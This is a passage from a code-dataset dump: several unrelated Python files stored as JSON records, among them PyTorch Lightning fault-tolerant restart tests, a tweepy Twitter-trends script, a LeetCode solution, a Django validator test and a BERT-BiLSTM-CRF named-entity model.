SequentialGetItemDataset,\n RandomGetItemDataset,\n # RandomGeneratorGetItemDataset,\n ],\n)\n@pytest.mark.parametrize(\"num_workers\", [0])\n@pytest.mark.parametrize(\"batch_size\", [1, 2, 3])\ndef test_dataset_rng_states_restart(dataset_class, num_workers, batch_size):\n \"\"\"Test that the sequence of batches coming from a random number generator continues with the correct sequence\n after reloading the state.\"\"\"\n\n def create_dataset_sampler():\n dset = CaptureMapDataset(dataset_class(16, 8))\n random_sampler = RandomSampler(dset, generator=torch.Generator())\n return dset, random_sampler\n\n def create_dataloader_sampler(dset, sampler):\n sampler = FastForwardSampler(sampler)\n sampler.setup(batch_size)\n dl = DataLoader(dset, num_workers=num_workers, sampler=sampler, batch_size=batch_size)\n _add_capture_metadata_collate(dl)\n return dl, sampler\n\n def fetch(fetcher, prefetch_iter, num_batches_fetched):\n batch, _ = next(prefetch_iter)\n\n state: List[MergedIteratorState] = fetcher.state\n assert len(state) == 1\n assert isinstance(state[0], MergedIteratorState)\n\n assert len(fetcher.dataloader_iter.cache_states) == 1\n if num_workers == 0:\n assert state[0].state[0].num_batches_fetched == num_batches_fetched\n return state\n\n dataset, random_sampler = create_dataset_sampler()\n dataloader, ff_sampler = create_dataloader_sampler(dataset, random_sampler)\n\n fetcher = DataFetcher()\n fetcher.setup(dataloader)\n prefetch_iter = iter(fetcher)\n\n # fetch 4 batches\n fetch(fetcher, prefetch_iter, 1)\n fetch(fetcher, prefetch_iter, 2)\n fetch(fetcher, prefetch_iter, 3)\n\n # (A) capture the state after fetching 4 batches\n state = fetch(fetcher, prefetch_iter, 4)\n state = deepcopy(state[0])\n\n # (B) simulate 2 additional batches\n batch05, _ = next(prefetch_iter)\n batch06, _ = next(prefetch_iter)\n\n # start reloading\n dataset, random_sampler = create_dataset_sampler()\n dataloader, ff_sampler = create_dataloader_sampler(dataset, random_sampler)\n\n # load the state dict saved at (A)\n ff_sampler.load_state_dict(state.sampler_states)\n dataset.load_state_dict(state.dataset_states, latest_worker_id=state.latest_worker_id, num_workers=num_workers)\n\n prefetcher = DataFetcher()\n prefetcher.setup(dataloader)\n prefetch_iter = iter(prefetcher)\n\n # fetch 2 random batches, these should match exactly the batches seen at (B)\n batch05_restart, _ = next(prefetch_iter)\n batch06_restart, _ = next(prefetch_iter)\n\n assert torch.equal(batch05, batch05_restart)\n assert torch.equal(batch06, batch06_restart)\n\n\nclass CustomException(Exception):\n pass\n\n\nclass SequentialIterableDataset(IterableDataset):\n def __init__(self, length, *_):\n self.len = length\n self.sampler = SequentialSampler(range(self.len))\n\n def __iter__(self):\n self.sampler_iter = iter(self.sampler)\n return self\n\n def __next__(self):\n indices = next(self.sampler_iter)\n return torch.tensor([indices]).float()\n\n\nclass SequentialDictIterableDataset(SequentialIterableDataset):\n def __next__(self):\n indices = next(self.sampler_iter)\n return {\"data\": torch.tensor([indices]).float()}\n\n\nclass TestModel(LightningModule):\n def __init__(self, fail_on_step: int = -1):\n super().__init__()\n self.layer = torch.nn.Linear(1, 2)\n self.seen_batches = []\n self.fail_on_step = fail_on_step\n\n def training_step(self, batch, batch_idx):\n if self.global_step == self.fail_on_step:\n raise CustomException()\n batch = batch[\"data\"] if isinstance(batch, dict) else batch\n self.seen_batches.append(torch.stack(batch) if isinstance(batch, list) else batch)\n loss = sum(self.layer(b).sum() for b in batch)\n return loss\n\n def configure_optimizers(self):\n return torch.optim.SGD(self.layer.parameters(), lr=0.1)\n\n\ndef _run_training(trainer_kwargs, dataset_classes, fail_on_step: int = -1, ckpt_path=None):\n seed_everything(1)\n train_dataloader = [\n DataLoader(dataset_class(3, 1), batch_size=1, num_workers=0) for dataset_class in dataset_classes\n ]\n train_dataloader = train_dataloader[0] if len(train_dataloader) == 1 else train_dataloader\n model = TestModel(fail_on_step=fail_on_step)\n trainer = Trainer(**trainer_kwargs)\n with suppress(CustomException):\n trainer.fit(model, train_dataloader=train_dataloader, ckpt_path=ckpt_path)\n return model.seen_batches, model.parameters()\n\n\n@mock.patch.dict(os.environ, {\"PL_FAULT_TOLERANT_TRAINING\": \"1\"})\n@RunIf(min_torch=\"1.7.0\")\n@pytest.mark.parametrize(\n \"dataset_classes\",\n [\n # single training dataset\n [RandomGetItemDataset],\n [SequentialIterableDataset],\n [SequentialDictIterableDataset],\n # multiple training datasets (combinded dataloader)\n [SequentialGetItemDataset, SequentialIterableDataset],\n [SequentialIterableDataset, SequentialIterableDataset],\n # [RandomGetItemDataset, RandomGetItemDataset], # TODO: support in the future\n ],\n)\n@pytest.mark.parametrize(\"multiple_trainloader_mode\", [\"min_size\", \"max_size_cycle\"])\ndef test_dataset_rng_states_restart_with_lightning(tmpdir, dataset_classes, multiple_trainloader_mode):\n \"\"\"Test that the Trainer can resume from a failed run in the case of several types of datasets.\"\"\"\n trainer_kwargs = dict(\n default_root_dir=tmpdir,\n max_epochs=3,\n enable_progress_bar=False,\n enable_model_summary=False,\n multiple_trainloader_mode=multiple_trainloader_mode,\n )\n\n all_batches, weights0 = _run_training(trainer_kwargs, dataset_classes)\n all_batches = torch.stack(all_batches)\n assert len(all_batches) == 9\n\n # Simulate 1st failure\n complete_batches, _ = _run_training(trainer_kwargs, dataset_classes, fail_on_step=4)\n assert len(complete_batches) == 4\n\n checkpoint_path = os.path.join(tmpdir, \".pl_auto_save.ckpt\")\n assert os.path.exists(checkpoint_path)\n\n # Resume after failure\n resumed_batches, weights1 = _run_training(\n trainer_kwargs, dataset_classes, fail_on_step=-1, ckpt_path=checkpoint_path\n )\n assert len(resumed_batches) == 5\n\n # the resumed batches should match the batches of the successful training\n all_batches_resumed = torch.stack(complete_batches + resumed_batches)\n assert len(all_batches_resumed) == 9\n assert torch.equal(all_batches, all_batches_resumed)\n\n # the final weights of a resumed training should equal the weights of an uninterrupted training\n for w0, w1 in zip(weights0, weights1):\n assert w0 is not w1\n assert torch.allclose(w0, w1)\n\n\n@mock.patch.dict(os.environ, {\"PL_FAULT_TOLERANT_TRAINING\": \"1\"})\n@RunIf(min_torch=\"1.7.0\")\n@pytest.mark.parametrize(\n [\"train_datasets\", \"val_datasets\"],\n [\n ([RandomGetItemDataset], [RandomGetItemDataset]),\n ([RandomGetItemDataset], [RandomGetItemDataset, RandomGetItemDataset]),\n ],\n)\n@pytest.mark.parametrize(\n \"val_check_interval\",\n [\n pytest.param(\n 0.5,\n marks=pytest.mark.xfail(\n reason=(\n \"TODO: the `train_dataloader` random state overrides the validation state when restarting training\"\n )\n ),\n ),\n 1.0,\n ],\n)\ndef test_auto_restart_within_validation_loop(train_datasets, val_datasets, val_check_interval, tmpdir):\n n_val_dataloaders = len(val_datasets)\n stop_dataloader = n_val_dataloaders - 1\n stop_batch = 1\n\n class ValidationLoopTestModel(LightningModule):\n def __init__(self, should_fail):\n super().__init__()\n self.layer = torch.nn.Linear(1, 2)\n self.should_fail = should_fail\n self.training_batches = []\n self.validation_batches = defaultdict(list)\n\n def step(self, batch):\n return sum(self.layer(b).sum() for b in batch)\n\n def training_step(self, batch, batch_idx):\n self.training_batches.append(batch)\n return self.step(batch)\n\n def validation_step(self, batch, batch_idx, dataloader_idx=0):\n if self.should_fail and stop_dataloader == dataloader_idx and batch_idx == stop_batch:\n raise CustomException\n self.validation_batches[dataloader_idx].append(batch)\n return self.step(batch)\n\n def configure_optimizers(self):\n return torch.optim.SGD(self.layer.parameters(), lr=0.1)\n\n def train_dataloader(self):\n return [DataLoader(cls(4, 1)) for cls in train_datasets]\n\n def val_dataloader(self):\n return [DataLoader(cls(4, 1)) for cls in val_datasets]\n\n def run(should_fail, resume):\n if not resume:\n seed_everything(42)\n\n model = ValidationLoopTestModel(should_fail)\n\n ckpt_path = str(tmpdir / \".pl_auto_save.ckpt\") if resume else None\n trainer = Trainer(\n default_root_dir=tmpdir,\n max_epochs=1,\n val_check_interval=val_check_interval,\n num_sanity_val_steps=0,\n )\n if should_fail:\n with pytest.raises(CustomException):\n trainer.fit(model, ckpt_path=ckpt_path)\n else:\n trainer.fit(model, ckpt_path=ckpt_path)\n\n return model.training_batches, model.validation_batches\n\n total_train_batches, total_val_batches = run(should_fail=False, resume=False)\n pre_fail_train_batches, pre_fail_val_batches = run(should_fail=True, resume=False)\n post_fail_train_batches, post_fail_val_batches = run(should_fail=False, resume=True)\n\n torch.testing.assert_allclose(total_train_batches, pre_fail_train_batches + post_fail_train_batches)\n for k in total_val_batches:\n torch.testing.assert_allclose(total_val_batches[k], pre_fail_val_batches[k] + post_fail_val_batches[k])\n\n\nclass TestAutoRestartModelUnderSignal(BoringModel):\n def __init__(self, should_signal: bool, failure_on_step: bool, failure_on_training: bool, on_last_batch: bool):\n super().__init__()\n self.should_signal = should_signal\n self.failure_on_step = failure_on_step\n self.failure_on_training = failure_on_training\n self.on_last_batch = on_last_batch\n self.seen_train_batches = []\n\n def _signal(self):\n if self.should_signal:\n # simulate `os.kill(os.getpid(), signal.SIGUSR1)`\n self.trainer._terminate_gracefully = True\n\n def training_step(self, batch, batch_idx):\n self.seen_train_batches.append(batch)\n should_signal = self.trainer.fit_loop.epoch_loop._is_training_done if self.on_last_batch else batch_idx == 2\n if self.failure_on_step and self.failure_on_training and should_signal:\n self._signal()\n return super().training_step(batch, batch_idx)\n\n def validation_step(self, batch, batch_idx):\n should_signal = (\n self.trainer.fit_loop.epoch_loop.val_loop.epoch_loop.batch_progress.is_last_batch\n if self.on_last_batch\n else batch_idx == 2\n )\n if self.failure_on_step and not self.failure_on_training and should_signal:\n self._signal()\n return super().validation_step(batch, batch_idx)\n\n def training_epoch_end(self, outputs) -> None:\n if not self.failure_on_step and self.failure_on_training:\n self._signal()\n\n def validation_epoch_end(self, outputs) -> None:\n if not self.failure_on_step and not self.failure_on_training:\n self._signal()\n\n def train_dataloader(self):\n return DataLoader(RandomDataset(32, 4))\n\n def val_dataloader(self):\n return DataLoader(RandomDataset(32, 4))\n\n\ndef _fit_model(\n tmpdir, should_signal, val_check_interval, failure_on_step, failure_on_training, on_last_batch, status=None\n):\n seed_everything(42)\n model = TestAutoRestartModelUnderSignal(should_signal, failure_on_step, failure_on_training, on_last_batch)\n\n trainer_kwargs = dict(\n default_root_dir=tmpdir,\n max_epochs=1,\n limit_train_batches=4,\n limit_val_batches=4,\n val_check_interval=val_check_interval,\n num_sanity_val_steps=0,\n )\n\n trainer = Trainer(**trainer_kwargs)\n if should_signal:\n with pytest.raises(ExitGracefullyException, match=status):\n trainer.fit(model)\n else:\n trainer.fit(model)\n assert trainer._terminate_gracefully == should_signal\n\n return model\n\n\n@pytest.mark.parametrize(\"on_last_batch\", [False, True])\n@pytest.mark.parametrize(\"val_check_interval\", [0.5, 1.0])\n@pytest.mark.parametrize(\"failure_on_training\", [False, True])\n@pytest.mark.parametrize(\"failure_on_step\", [False, True])\n@mock.patch.dict(os.environ, {\"PL_FAULT_TOLERANT_TRAINING\": \"1\"})\n@RunIf(min_torch=\"1.7.0\", skip_windows=True)\ndef test_auto_restart_under_signal(on_last_batch, val_check_interval, failure_on_training, failure_on_step, tmpdir):\n \"\"\"This test asserts that if a signal is being sent during the training / validation phase, the model should\n restart in a reproducible way.\"\"\"\n\n model_total = _fit_model(tmpdir, False, val_check_interval, failure_on_step, failure_on_training, on_last_batch)\n\n if failure_on_step:\n if on_last_batch:\n if failure_on_training:\n # Breaking on first validation batch.\n # This is done to capture the random state of the validation dataloader.\n status = \"EvaluationEpochLoop:advance\"\n else:\n # when breaking on last batch of validation, we should exist on `run_end` val_check_interval == 1.0\n status = (\n \"TrainingEpochLoop:on_run_end\" if val_check_interval == 1.0 else \"TrainingEpochLoop:on_advance_end\"\n )\n else:\n status = \"TrainingEpochLoop:on_advance_end\" if failure_on_training else \"EvaluationEpochLoop:advance\"\n else:\n if val_check_interval == 1.0:\n status = \"TrainingEpochLoop:on_run_end\"\n else:\n # `training_epoch_end` happens after `validation_epoch_end` since Lightning v1.4\n status = \"TrainingEpochLoop:on_run_end\" if failure_on_training else \"TrainingEpochLoop:on_advance_end\"\n\n model_signaled = _fit_model(\n tmpdir, True, val_check_interval, failure_on_step, failure_on_training, on_last_batch, status=status\n )\n checkpoint_path = str(tmpdir / \".pl_auto_save.ckpt\")\n assert os.path.exists(checkpoint_path)\n model_restarted = _fit_model(tmpdir, False, val_check_interval, failure_on_step, failure_on_training, on_last_batch)\n\n # check the batches\n actual = torch.cat(model_signaled.seen_train_batches + model_restarted.seen_train_batches)\n expected = torch.cat(model_total.seen_train_batches)\n assert torch.equal(actual, expected)\n\n # FIXME: why `on_last_batch` doesn't work ?\n if failure_on_step and failure_on_training and not on_last_batch:\n assert not torch.equal(model_total.layer.weight, model_signaled.layer.weight)\n assert torch.equal(model_restarted.layer.weight, model_total.layer.weight)\n\n checkpoint = torch.load(checkpoint_path)[\"loops\"][\"fit_loop\"]\n p = checkpoint[\"epoch_loop.batch_progress\"]\n if p[\"is_last_batch\"] and p[\"current\"][\"completed\"] == 4:\n assert \"dataloader_state_dict\" not in checkpoint[\"epoch_loop.state_dict\"]\n else:\n assert \"dataloader_state_dict\" in checkpoint[\"epoch_loop.state_dict\"]\n\n state_dict = checkpoint[\"epoch_loop.val_loop.epoch_loop.state_dict\"]\n p = checkpoint[\"epoch_loop.val_loop.epoch_loop.batch_progress\"]\n if (p[\"is_last_batch\"] and p[\"current\"][\"completed\"] == 4) or p[\"current\"][\"ready\"] == 0:\n assert \"dataloader_state_dict\" not in state_dict\n else:\n assert \"dataloader_state_dict\" in state_dict\n","repo_name":"Eashurox/CPDP_ML","sub_path":"Dataset/ML Projects/Lightning_Versions/lightning-1.5.0/tests/utilities/test_auto_restart.py","file_name":"test_auto_restart.py","file_ext":"py","file_size_in_byte":44663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"11102333485","text":"import os\nfrom datetime import datetime, timezone, timedelta\nimport tweepy\nfrom dotenv import load_dotenv, find_dotenv\n\nenv_path = os.path.join(os.path.dirname(__file__), \".env\")\nif find_dotenv(env_path):\n load_dotenv(dotenv_path=env_path)\n\nCONSUMER_KEY = os.getenv(\"CONSUMER_KEY\")\nCONSUMER_SECRET = os.getenv(\"CONSUMER_SECRET\")\n\nif not all([CONSUMER_KEY, CONSUMER_SECRET]):\n raise NameError(\"API key is not provided\")\n\nauth = tweepy.AppAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)\napi = tweepy.API(auth, wait_on_rate_limit=True)\n\nWOEID_JAPAN = 23424856\nJST_TZ = timezone(timedelta(hours=9), name=\"JST\")\n\n\ndef get_trend_data():\n trends_japan = api.trends_place(id=WOEID_JAPAN)[0]\n\n date_iso = trends_japan[\"as_of\"]\n date_jst_str = convert_iso_datetime_to_jst(date_iso)\n\n trend_topics = (topic[\"name\"] for topic in trends_japan[\"trends\"])\n trend_ranking = []\n for i, j in enumerate(trend_topics):\n trend_ranking.append({\"number\": i + 1, \"topic_name\": j})\n # 50件までしかトレンドを取得できないはずだが、仕様変更に備えて\n # 明確に上限を50件に設定する\n if i > 50:\n break\n\n trend = {\n \"date\": date_jst_str,\n \"location\": \"日本\",\n \"rank\": trend_ranking\n }\n return trend\n\n\ndef convert_iso_datetime_to_jst(date_iso, output_format=\"%Y/%m/%d %H:%M\"):\n \"\"\"ISO8601形式の日付の文字列を日本時間の日付の文字列に変換\"\"\"\n date_iso = date_iso.replace(\"Z\", \"+00:00\")\n date = datetime.fromisoformat(date_iso)\n date_jst = date.astimezone(JST_TZ)\n date_jst_str = date_jst.strftime(output_format)\n return date_jst_str\n\n\nif __name__ == \"__main__\":\n trend = get_trend_data()\n print(trend)\n","repo_name":"yuki-data/flask_twitter_trend","sub_path":"twitter_trend.py","file_name":"twitter_trend.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"8156030288","text":"\"\"\"\n\n66. Plus One\n\nGiven a non-empty array of digits representing a non-negative integer, plus one to the integer.\n\nThe digits are stored such that the most significant digit is at the head of the list, and each element in the array contain a single digit.\n\nYou may assume the integer does not contain any leading zero, except the number 0 itself.\n\n\"\"\"\n\nclass Solution:\n def plusOne(self, digits):\n \"\"\"\n :type digits: List[int]\n :rtype: List[int]\n \"\"\"\n length = len(digits)\n for x in range(length-1, -1, -1):\n if digits[x] == 9 and x == 0:\n digits[x] = 0\n digits.insert(0, 1)\n break\n if digits[x] == 9:\n digits[x] = 0\n continue\n else:\n digits[x] += 1\n break\n \n return digits\n ","repo_name":"kyrierose/leet-code-solutions","sub_path":"66.py","file_name":"66.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18263987798","text":"from rest_framework.exceptions import ValidationError\n\nfrom django.test import TestCase\n\nfrom audoma.drf.validators import ExclusiveFieldsValidator\n\n\nclass ExclusiveFieldsValidatorTestCase(TestCase):\n databases = \"__all__\"\n\n def setUp(self):\n self.validator = ExclusiveFieldsValidator(\n fields=[\"name\", \"company_name\"],\n message=\"Fields: {field_names} are mutually exclusive\",\n required=True,\n message_required=\"At least one of the fields: {field_names} is required\",\n )\n\n def test_call_none_in_data(self):\n try:\n self.validator(data={\"age\": 245})\n except Exception as e:\n self.assertEqual(type(e), ValidationError)\n self.assertEqual(\n str(e.detail[0]),\n \"At least one of the fields: name, company_name is required\",\n )\n\n def test_call_all_in_data(self):\n try:\n self.validator(data={\"name\": \"Test\", \"company_name\": \"Test\"})\n except Exception as e:\n self.assertEqual(type(e), ValidationError)\n self.assertEqual(\n str(e.detail[0]), \"Fields: name, company_name are mutually exclusive\"\n )\n\n def test_call_one_in_data(self):\n try:\n val_response = self.validator(data={\"name\": \"Test\"})\n except Exception as e:\n raise e\n else:\n self.assertIsNone(val_response)\n","repo_name":"Iteo/audoma","sub_path":"audoma/tests/drf/test_validators.py","file_name":"test_validators.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"5347979636","text":"#Please write a function named even_numbers, which takes a list of integers as\r\n#an argument. The function returns a new list containing the even numbers from\r\n#the original list.\r\n\r\ndef anagrams(word1,word2):\r\n return sorted(word1) == sorted(word2)\r\n \r\n\r\nmy_list = [1, 2, 3, 4, 5]\r\n\r\n\r\ndef even_numbers(my_list):\r\n even_list = []\r\n for i in my_list:\r\n if i%2 == 0:\r\n even_list.append(i)\r\n print(even_list)\r\n return even_list\r\n\r\n\r\nnew_list = even_numbers(my_list)\r\n\r\nprint(\"original\", my_list)\r\nprint(\"new\", new_list)\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"IronixGirl/Python-learning-and-exercises","sub_path":"Week 04 - 05/Exercises/21_function 2.py","file_name":"21_function 2.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"70504101603","text":"import tensorflow as tf\nfrom tf_utils.bert_modeling import get_assignment_map_from_checkpoint\nfrom tensorflow.contrib.crf import crf_log_likelihood\nfrom tensorflow.contrib.layers.python.layers import initializers\nfrom tf_utils import rnncell as rnn\nfrom optimization import create_optimizer\n\n\nclass Model:\n def __init__(self, config):\n self.config = config\n # 喂入模型的数据占位符\n self.input_x_word = tf.compat.v1.placeholder(tf.int32, [None, None], name=\"input_x_word\")\n self.input_x_len = tf.compat.v1.placeholder(tf.int32, name='input_x_len')\n self.input_mask = tf.compat.v1.placeholder(tf.int32, [None, None], name='input_mask')\n self.keep_prob = tf.compat.v1.placeholder(tf.float32, name='dropout_keep_prob')\n self.input_relation = tf.compat.v1.placeholder(tf.int32, [None, None], name='input_relation') # 实体NER的真实标签\n self.is_training = tf.compat.v1.placeholder(tf.bool, None, name='is_training')\n # self.global_step = tf.get_variable('step', [], initializer=0, trainable=False)\n self.global_step = tf.Variable(0, name='step', trainable=False)\n\n # BERT Embedding\n self.word_embedding = self.init_embedding()\n\n # 超参数设置\n self.learning_rate = self.config.learning_rate\n self.embed_learning_rate = self.config.embed_learning_rate\n self.relation_num = self.config.relation_num\n self.initializer = initializers.xavier_initializer()\n self.lstm_dim = self.config.lstm_dim\n # self.embed_dense_dim = self.config.embed_dense_dim\n self.dropout = self.config.dropout\n\n # CRF超参数\n used = tf.sign(tf.abs(self.input_x_word))\n length = tf.reduce_sum(used, reduction_indices=1)\n self.lengths = tf.cast(length, tf.int32)\n self.batch_size = tf.shape(self.input_x_word)[0]\n self.num_steps = tf.shape(self.input_x_word)[-1]\n lstm_inputs = tf.nn.dropout(self.word_embedding, self.dropout)\n lstm_outputs = self.bilstm_layer(lstm_inputs, self.lstm_dim, self.lengths)\n self.logits = self.project_layer(lstm_outputs)\n\n self.trans = tf.compat.v1.get_variable(\n name=\"transitions\",\n shape=[self.relation_num + 1, self.relation_num + 1], # 1\n initializer=self.initializer)\n\n # 计算损失\n self.loss = self.loss_layer(self.logits, self.lengths)\n\n # bert模型参数初始化的地方\n init_checkpoint = self.config.bert_file\n # 获取模型中所有的训练参数。\n tvars = tf.trainable_variables()\n if self.config.model_type == \"XLNET\":\n mark = 'transformer'\n\n else:\n mark = 'bert'\n bert_variables = [x for x in tvars if mark in x.name] # BERT的参数\n normal_variables = [x for x in tvars if mark not in x.name] # 下接结构的参数\n print('bert train variable num: {}'.format(len(bert_variables)))\n print('normal train variable num: {}'.format(len(normal_variables)))\n\n # 加载BERT模型\n (assignment_map, initialized_variable_names) = get_assignment_map_from_checkpoint(tvars, init_checkpoint)\n tf.compat.v1.train.init_from_checkpoint(init_checkpoint, assignment_map)\n print(\"**** Trainable Variables ****\")\n # 打印加载模型的参数\n train_vars = []\n for var in tvars:\n init_string = \"\"\n if var.name in initialized_variable_names:\n init_string = \", *INIT_FROM_CKPT*\"\n else:\n train_vars.append(var)\n print(\" name = {}, shape = {}{}\".format(var.name, var.shape, init_string))\n\n # memory limited ==> sequence_length=64 train_batch_size=5\n with tf.variable_scope(\"optimizer\"):\n normal_optimizer = tf.compat.v1.train.AdamOptimizer(self.learning_rate) # 下接结构的学习率\n normal_op = normal_optimizer.minimize(self.loss, global_step=self.global_step, var_list=normal_variables)\n num_train_steps = int(self.config.num_records / self.config.train_batch_size * self.config.train_epoch)\n if bert_variables: # 对BERT微调\n print('word2vec trainable!!')\n word2vec_op, self.embed_learning_rate = \\\n create_optimizer(\n self.loss, self.embed_learning_rate,\n num_train_steps=num_train_steps,\n num_warmup_steps=int(num_train_steps * self.config.warmup_proportion),\n use_tpu=False, var_list=bert_variables\n )\n\n self.train_op = tf.group(normal_op, word2vec_op) # 组装BERT与下接结构参数\n else:\n self.train_op = normal_op\n\n self.learning_rate = tf.train.exponential_decay(self.learning_rate, self.global_step, self.config.decay_step,\n self.config.decay_rate, staircase=True)\n # saver of the model\n self.saver = tf.train.Saver(tf.global_variables(), max_to_keep=self.config.num_checkpoints)\n\n def bilstm_layer(self, lstm_inputs, lstm_dim, lengths, name=None):\n \"\"\"\n :param lstm_inputs: [batch_size, num_steps, emb_size]\n :param lstm_dim:\n :param lengths:\n :param name:\n :return: [batch_size, num_steps, 2*lstm_dim]\n \"\"\"\n with tf.name_scope(\"char_BiLSTM\" if not name else name):\n lstm_cell = {}\n for direction in [\"forward\", \"backward\"]:\n with tf.name_scope(direction):\n lstm_cell[direction] = rnn.CoupledInputForgetGateLSTMCell(\n lstm_dim,\n use_peepholes=True,\n initializer=self.initializer,\n state_is_tuple=True)\n\n outputs, final_states = tf.nn.bidirectional_dynamic_rnn(\n lstm_cell[\"forward\"],\n lstm_cell[\"backward\"],\n lstm_inputs,\n dtype=tf.float32,\n sequence_length=lengths)\n return tf.concat(outputs, axis=2)\n\n def project_layer(self, lstm_outputs, name=None):\n \"\"\"\n hidden layer between lstm layer and logits\n :param lstm_outputs: [batch_size, num_steps, emb_size]\n :param name:\n :return: [batch_size, num_steps, num_tags]\n \"\"\"\n with tf.name_scope(\"project\" if not name else name):\n with tf.name_scope(\"hidden\"):\n w = tf.get_variable(\"HW\", shape=[self.lstm_dim * 2, self.lstm_dim],\n dtype=tf.float32, initializer=self.initializer)\n\n b = tf.get_variable(\"Hb\", shape=[self.lstm_dim], dtype=tf.float32,\n initializer=tf.zeros_initializer())\n output = tf.reshape(lstm_outputs, shape=[-1, self.lstm_dim * 2])\n hidden = tf.tanh(tf.nn.xw_plus_b(output, w, b))\n\n # project to score of ori_tags.txt\n with tf.name_scope(\"logits\"):\n w = tf.get_variable(\"LW\", shape=[self.lstm_dim, self.relation_num],\n dtype=tf.float32, initializer=self.initializer)\n\n b = tf.get_variable(\"Lb\", shape=[self.relation_num], dtype=tf.float32,\n initializer=tf.zeros_initializer())\n\n pred = tf.nn.xw_plus_b(hidden, w, b)\n\n return tf.reshape(pred, [-1, self.num_steps, self.relation_num], name='pred_logits')\n\n def loss_layer(self, project_logits, lengths, name=None):\n \"\"\"\n 计算CRF的loss\n :param project_logits: [1, num_steps, num_tags]\n :param lengths:\n :param name:\n :return: scalar loss\n \"\"\"\n\n with tf.name_scope(\"crf_loss\" if not name else name):\n small = -1000.0\n # pad logits for crf loss\n start_logits = tf.concat(\n [small * tf.ones(shape=[self.batch_size, 1, self.relation_num]),\n tf.zeros(shape=[self.batch_size, 1, 1])],\n axis=-1)\n pad_logits = tf.cast(small * tf.ones([self.batch_size, self.num_steps, 1]), tf.float32)\n logits = tf.concat([project_logits, pad_logits], axis=-1)\n logits = tf.concat([start_logits, logits], axis=1)\n targets = tf.concat(\n [tf.cast(self.relation_num * tf.ones([self.batch_size, 1]), tf.int32), self.input_relation], axis=-1)\n\n log_likelihood, self.trans = crf_log_likelihood(\n inputs=logits,\n tag_indices=targets,\n transition_params=self.trans,\n sequence_lengths=lengths + 1\n )\n return tf.reduce_mean(-log_likelihood, name='loss')\n\n def init_embedding(self):\n \"\"\"\n 对BERT的Embedding降维\n :return:\n \"\"\"\n with tf.name_scope('embedding'):\n word_embedding = self.bert_embed()\n print('self.embed_dense_dim:', self.config.embed_dense_dim)\n word_embedding = tf.layers.dense(word_embedding, self.config.embed_dense_dim, activation=tf.nn.relu)\n print(\"word_embedding.shape:\" + str(word_embedding.shape))\n\n return word_embedding\n\n def bert_embed(self):\n \"\"\"\n 读取BERT的TF模型\n :return:\n \"\"\"\n if self.config.model_type == \"ALBERT\":\n from tf_utils.albert_modeling import BertModel, BertConfig\n elif self.config.model_type == \"BERT\":\n from tf_utils.bert_modeling import BertModel, BertConfig\n else:\n import tf_utils.xlnet_modeling as xlnet\n xlnet_config = xlnet.XLNetConfig(json_path=self.config.xlnet_config_file)\n run_config = xlnet.create_run_config(self.is_training, True, self.config)\n\n xlnet_model = xlnet.XLNetModel(\n xlnet_config=xlnet_config,\n run_config=run_config,\n input_ids=self.input_x_word,\n seg_ids=None,\n input_mask=self.input_mask)\n final_hidden_states = xlnet_model.get_sequence_output()\n self.config.embed_dense_dim = 512\n return final_hidden_states\n\n bert_config_file = self.config.bert_config_file\n bert_config = BertConfig.from_json_file(bert_config_file)\n # batch_size, max_seq_length = get_shape_list(self.input_x_word)\n # bert_mask = tf.pad(self.input_mask, [[0, 0], [2, 0]], constant_values=1) # tensor左边填充2列\n model = BertModel(\n config=bert_config,\n is_training=self.is_training, # 微调\n input_ids=self.input_x_word,\n input_mask=self.input_mask,\n token_type_ids=None,\n use_one_hot_embeddings=False\n )\n\n if self.config.use_origin_bert:\n final_hidden_states = model.get_sequence_output() # 原生bert\n self.config.embed_dense_dim = 1024\n else:\n layer_logits = []\n for i, layer in enumerate(model.all_encoder_layers):\n layer_logits.append(\n tf.layers.dense(\n layer, 1,\n kernel_initializer=tf.truncated_normal_initializer(stddev=0.02),\n name=\"layer_logit%d\" % i\n )\n )\n\n layer_logits = tf.concat(layer_logits, axis=2) # 第三维度拼接\n layer_dist = tf.nn.softmax(layer_logits)\n seq_out = tf.concat([tf.expand_dims(x, axis=2) for x in model.all_encoder_layers], axis=2)\n pooled_output = tf.matmul(tf.expand_dims(layer_dist, axis=2), seq_out)\n pooled_output = tf.squeeze(pooled_output, axis=2)\n char_bert_outputs = pooled_output\n final_hidden_states = char_bert_outputs # 多层融合bert\n self.config.embed_dense_dim = 512\n\n return final_hidden_states\n","repo_name":"jevishoo/Tensorflow_NER","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":11996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"1911423995","text":"import os\nimport csv\nimport glob\nimport json\nimport time\nfrom collections import OrderedDict\nfrom xml.dom.minidom import getDOMImplementation\n\nfrom nltk import word_tokenize\nfrom pymorphy2 import MorphAnalyzer\n\n\nclass Profiler:\n def __enter__(self):\n self._startTime = time.time()\n\n def __exit__(self, type, value, traceback):\n print('Elapsed time: {:.3f} sec'.format(time.time() - self._startTime))\n\n\nclass Processor:\n\n def __init__(self, inpt_dir, otpt_dir, gold_path, coding):\n self.inpt_dir = inpt_dir\n self.otpt_dir = otpt_dir\n os.makedirs(self.otpt_dir, exist_ok=True)\n\n gold_file = open(gold_path, mode='r', encoding='utf-8', newline='')\n self.gold_reader = list(row for row in csv.reader(gold_file, delimiter=';') if int(row[3]) > 3)\n\n self.coding = coding\n self.morph = MorphAnalyzer()\n self.impl = getDOMImplementation()\n\n self.tr = ('?', '!', ';', '(', ')', '[', ']', '//')\n self.nt = (\"'\", \"''\", '\"', '``', '«', '»', '„', '“', '“', '”', '‘', '’', '%')\n self.abbr = json.load(open('abbr.json', mode='r', encoding='utf-8'))\n self.prep = json.load(open('prep.json', mode='r', encoding='utf-8'))\n self.conj = json.load(open('conj.json', mode='r', 